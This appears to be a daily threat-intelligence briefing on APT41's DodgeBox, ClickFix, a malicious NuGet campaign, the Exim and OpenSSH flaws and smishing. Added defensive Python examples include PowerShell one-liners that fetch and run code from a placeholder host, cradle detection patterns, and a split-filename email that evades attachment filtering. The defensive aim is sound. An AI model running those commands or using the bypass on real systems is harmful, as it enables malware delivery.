Cyware Daily Threat Intelligence

Daily Threat Briefing • Jul 12, 2024
The cyber-espionage group APT41 has added two tools to its malware arsenal: DodgeBox, a shellcode loader that succeeds StealthVector, and the MoonWalk backdoor it deploys, which uses Google Drive for command-and-control.
In a separate threat, over 1.5 million email servers are exposed to a severe Exim mail transfer agent flaw, rated 9.1 in severity. The bug lets attackers slip blocked attachment types past Exim's filename-extension filtering; it affects Exim versions up to 4.97.1, and a fix is available in Release Candidate 3 of Exim 4.98.
Additionally, the Smishing Triad has run a campaign in India, impersonating India Post to phish for PII and payment data via fraudulent iMessages.
Meet DodgeBox, APT41’s new malware
The Chinese government-backed cyber espionage group APT41 has added a new loader called DodgeBox and a backdoor named MoonWalk to its arsenal of malware tools, according to research by Zscaler ThreatLabz. DodgeBox, similar to APT41's StealthVector, is a shellcode loader with advanced features such as encryption, environment checks, and evasion techniques. It also drops the MoonWalk backdoor, which utilizes Google Drive for command-and-control communication.
New FishXProxy phishing kit
A new phishing toolkit called FishXProxy enables cybercriminals to conduct sophisticated phishing attacks with ease. The toolkit includes advanced features such as an antibot system, Cloudflare integration, inbuilt redirector, page expiration settings, and cross-project user tracking. It also allows for the generation of malicious file attachments using HTML smuggling techniques. The toolkit lowers the technical barriers to conducting phishing campaigns, posing a significant threat.
ClickFix infection chain deploys malware
McAfee Labs discovered a new malware delivery method called the ClickFix infection chain, which uses social engineering to trick users into executing malicious scripts. This method starts with users visiting compromised websites and being redirected to fake popup windows, where they are instructed to paste a script into a PowerShell terminal, leading to malware infiltration. The sophisticated technique is used by malware families like Lumma Stealer and DarkGate, with the latter being particularly challenging to detect and remove. Phishing emails also play a crucial role in this infection chain by tricking users into downloading and executing malicious software.
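The ClickFix chain ends with a user-pasted PowerShell one-liner, which leaves a recognisable trace in process-creation telemetry: PowerShell spawned from the shell, usually with window-hiding or policy-bypass flags and a download-and-execute cradle, sometimes base64-encoded. The following is an added example of heuristic triage over such events; it is not McAfee's detection logic, and the events and the `example.test` URLs are constructed for this illustration.

```python
"""Added example (not McAfee's detection logic): heuristic triage of Windows
process-creation events for ClickFix-style PowerShell execution.
The events below are constructed for this illustration."""
import base64
import re

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Download-and-execute cradle indicators, matched case-insensitively against
# the raw command line and, when present, the decoded -EncodedCommand payload.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"downloadstring", r"downloadfile",
    r"\birm\b", r"\biwr\b", r"invoke-restmethod", r"invoke-webrequest",
    r"net\.webclient", r"\bmshta\b",
]
# Flags that hide the window or suppress policy, common in pasted one-liners.
EVASION_PATTERNS = [
    r"-w(?:indowstyle)?\s+h(?:idden)?\b", r"-nop(?:rofile)?\b",
    r"-(?:ep|exec|executionpolicy)\s+bypass\b",
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE text), or None."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return a verdict and the reasons behind it for one process event."""
    cmdline = event["cmdline"]
    decoded = decode_encoded_command(cmdline)
    text = cmdline + ("\n" + decoded if decoded else "")
    from_shell = (event["image"].lower() in POWERSHELL_IMAGES
                  and event["parent"].lower() == "explorer.exe")
    cradle = [p for p in CRADLE_PATTERNS if re.search(p, text, re.I)]
    evasion = [p for p in EVASION_PATTERNS if re.search(p, text, re.I)]
    reasons = []
    if from_shell:
        reasons.append("powershell launched from the shell (Run dialog or pasted command)")
    if decoded is not None:
        reasons.append("encoded command")
    reasons += ["cradle: " + p for p in cradle]
    reasons += ["evasion: " + p for p in evasion]
    # A cradle is required; the interactive origin, encoding or evasion flags
    # raise it from "admin doing admin things" to "worth a look".
    suspicious = bool(cradle) and (from_shell or decoded is not None or bool(evasion))
    return {"decoded": decoded, "reasons": reasons, "suspicious": suspicious}


# Constructed payload and events (a subset of the fields Sysmon event 1 carries).
_PLAIN_PAYLOAD = 'IEX (New-Object Net.WebClient).DownloadString("http://example.test/loader")'
_ENCODED = base64.b64encode(_PLAIN_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe"},
    {"parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -NoProfile -Command "Get-Service -Name Spooler"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell.exe -w hidden -c "iex (irm http://example.test/fix.ps1)"'},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -ep bypass -enc " + _ENCODED},
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(score_event(ev))
```

The first two events (a user opening a console, an admin querying a service from cmd.exe) score clean; the two pasted one-liners score suspicious, the encoded one only because the payload is decoded before matching.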
Malicious NuGet campaign
ReversingLabs detailed a malicious campaign targeting the NuGet package manager, which has evolved to include tactics such as using obfuscated downloaders, exploiting NuGet’s MSBuild integrations, and manipulating legitimate PE .NET binaries using IL weaving. The threat actors used techniques like typo-squatting and homoglyphs to evade detection and distributed malicious code, including the SeroXen RAT. Approximately 60 packages and 290 package versions were identified as part of this campaign.
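Two of the tactics above are checkable on the consumer side: a look-alike package ID (typo or homoglyph) against the packages a project actually expects, and `.targets`/`.props` files under a package's `build` folders that run commands at restore or build time. The block below is an added example of both checks; it is not ReversingLabs' tooling, the allow-list is constructed, and the sample `.nupkg` is built in memory for this illustration.

```python
"""Added example (not ReversingLabs' tooling): two consumer-side checks on
NuGet package IDs and package files. The allow-list and the sample .nupkg
are constructed for this illustration."""
import io
import re
import unicodedata
import zipfile

# Constructed allow-list of packages this project expects to depend on.
KNOWN_PACKAGES = ["Newtonsoft.Json", "Serilog", "Microsoft.Extensions.Logging", "Moq"]

# Characters that render like Latin letters: Cyrillic look-alikes and
# digit-for-letter swaps. Extend as needed.
HOMOGLYPHS = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0445": "x", "\u0443": "y", "\u0456": "i", "\u0458": "j", "\u0131": "i",
    "0": "o", "1": "l",
}


def normalize(package_id):
    """Case-fold (NuGet IDs are case-insensitive) and fold homoglyphs."""
    folded = unicodedata.normalize("NFKC", package_id).lower()
    return "".join(HOMOGLYPHS.get(ch, ch) for ch in folded)


def levenshtein(a, b):
    """Edit distance, used to catch one-character typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(package_id, known=KNOWN_PACKAGES):
    """Return (verdict, matched_known_package) for a package ID."""
    lowered = package_id.lower()
    for k in known:
        if k.lower() == lowered:
            return ("known", k)
    norm = normalize(package_id)
    for k in known:
        nk = normalize(k)
        if norm == nk:
            return ("homoglyph", k)
        if levenshtein(norm, nk) <= 1:
            return ("typosquat", k)
    return ("unrelated", None)


MSBUILD_DIRS = ("build/", "buildtransitive/", "buildmultitargeting/")
RISKY_MSBUILD = re.compile(r"<(?:Exec|UsingTask)\b", re.I)


def risky_msbuild_hooks(nupkg_bytes):
    """List .targets/.props files under the package's build folders that
    declare Exec or UsingTask, i.e. code that runs at restore/build time."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(nupkg_bytes)) as pkg:
        for name in pkg.namelist():
            low = name.lower()
            if low.startswith(MSBUILD_DIRS) and low.endswith((".targets", ".props")):
                if RISKY_MSBUILD.search(pkg.read(name).decode("utf-8", "replace")):
                    hits.append(name)
    return hits


def make_sample_nupkg():
    """Constructed package: a homoglyph ID with a build hook that runs a
    command whenever the consuming project is built."""
    pkg_id = "Newtonsoft.Js\u043en"  # Cyrillic 'o' in place of Latin 'o'
    targets = (
        '<Project><Target Name="Init" BeforeTargets="Build">'
        '<Exec Command="cmd /c echo build hook ran" /></Target></Project>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as pkg:
        pkg.writestr(pkg_id + ".nuspec", "<package />")
        pkg.writestr("build/" + pkg_id + ".targets", targets)
    return buf.getvalue()


if __name__ == "__main__":
    for candidate in ["Newtonsoft.Json", "Newtonsoft.Js\u043en", "Seri1og", "Dapper"]:
        print(candidate, classify(candidate))
    print(risky_msbuild_hooks(make_sample_nupkg()))
```

A legitimate package can ship build hooks too, so the second check is a review trigger rather than a verdict; the combination of a look-alike ID and an `Exec` in `build/` is the pattern that should stop a restore.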
Exim bug affects 1.5 million servers
Over 1.5 million email servers are exposed to a critical vulnerability in the Exim mail transfer agent that lets attackers deliver executable attachments past extension-based filtering. Tracked as CVE-2024-39929 and rated 9.1 out of 10, the bug is a parsing error: Exim mishandles attachment filenames that are split across multiple RFC 2231 header sections, so a name whose blocked extension only appears once the sections are reassembled slips past $mime_filename-based blocking rules. All Exim versions up to and including 4.97.1 are affected; the fix is in Release Candidate 3 of Exim 4.98. Until it is deployed, attachment extension filtering at the MTA should not be treated as the only control against executable attachments.
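The mechanism behind this class of bypass is easy to see with a message whose filename is split across RFC 2231 continuation sections. The following is an added example, not Exim's code: a deliberately naive extractor that reads only the first `filename` fragment is compared with Python's RFC 2231-aware `get_filename()`, over a message constructed for this illustration. The blocked-extension list and the `example.test` addresses are assumptions.

```python
"""Added example (not Exim's code): why a filter that reads only the first
fragment of an RFC 2231 filename misses a blocked extension.
The sample message is constructed for this illustration."""
import email
import os
import re

BLOCKED_EXTENSIONS = {".exe", ".scr", ".bat", ".cmd", ".js", ".vbs"}

# Constructed message: the attachment name is split across two RFC 2231
# sections (filename*0, filename*1), so no single fragment contains ".exe".
SAMPLE_MESSAGE = """\
From: sender@example.test
To: victim@example.test
Subject: Invoice
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="bnd"

--bnd
Content-Type: text/plain

Please see the attached invoice.
--bnd
Content-Type: application/octet-stream
Content-Disposition: attachment;
 filename*0="invoice.ex";
 filename*1="e"

TVqQAAMAAAAEAAAA
--bnd--
"""

# Hypothetical weak extractor: takes the first filename=... it can find and
# never reassembles continuation sections.
_FIRST_FILENAME = re.compile(r'filename[^=;]*=\s*"?([^";\r\n]+)"?', re.IGNORECASE)


def naive_filename(content_disposition):
    """Return the first filename fragment on the header, or None."""
    match = _FIRST_FILENAME.search(content_disposition)
    return match.group(1).strip() if match else None


def is_blocked(filename):
    """Extension-based block check, as a mail filter would apply it."""
    if not filename:
        return False
    return os.path.splitext(filename)[1].lower() in BLOCKED_EXTENSIONS


def audit_attachments(raw_message):
    """Compare the naive extractor with the stdlib's RFC 2231-aware parsing
    for every attachment part of the message."""
    msg = email.message_from_string(raw_message)
    findings = []
    for part in msg.walk():
        if part.get_content_disposition() != "attachment":
            continue
        naive = naive_filename(str(part.get("Content-Disposition")))
        actual = part.get_filename()  # reassembles filename*0, filename*1, ...
        findings.append({
            "naive": naive,
            "actual": actual,
            "naive_blocks": is_blocked(naive),
            "correct_blocks": is_blocked(actual),
        })
    return findings


if __name__ == "__main__":
    for finding in audit_attachments(SAMPLE_MESSAGE):
        print(finding)
```

The naive extractor sees `invoice.ex` and lets the part through; the reassembled name is `invoice.exe` and is blocked. Any filter that makes its decision before continuation sections are joined has the same blind spot.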
New OpenSSH vulnerability spotted
A new signal handler race condition, tracked as CVE-2024-6409, has been found in the sshd builds shipped with RHEL 9.x and its derivatives. It affects the OpenSSH 8.7p1 and 8.8p1 packages used in RHEL 9 and in Fedora 36 and 37. The race is reached through the cleanup_exit() path that the SIGALRM handler invokes when a client exceeds LoginGraceTime, and it is triggered in the unprivileged, chrooted privilege-separation child rather than in the root sshd process, so successful exploitation yields remote code execution with limited privileges. The issue has been reported only in these distribution builds, and Fedora 36 and 37 are end-of-life, so practical exposure is mainly RHEL 9.x and its rebuilds. Until patched packages are installed, setting LoginGraceTime to 0 in sshd_config prevents the alarm handler from running at all, at the cost of leaving sshd open to connection-exhaustion denial of service.
Smishing Triad targets India
Smishing Triad has been registering multiple domain names impersonating the India Post to carry out large-scale smishing campaigns to steal PII and payment data. The group uses compromised and registered iCloud accounts to send fraudulent iMessages with smishing URLs, directing victims to provide personal and payment details under the pretext of a failed package delivery. This threat has been observed targeting a wide range of individuals in India, including consumers, businesses, and government entities.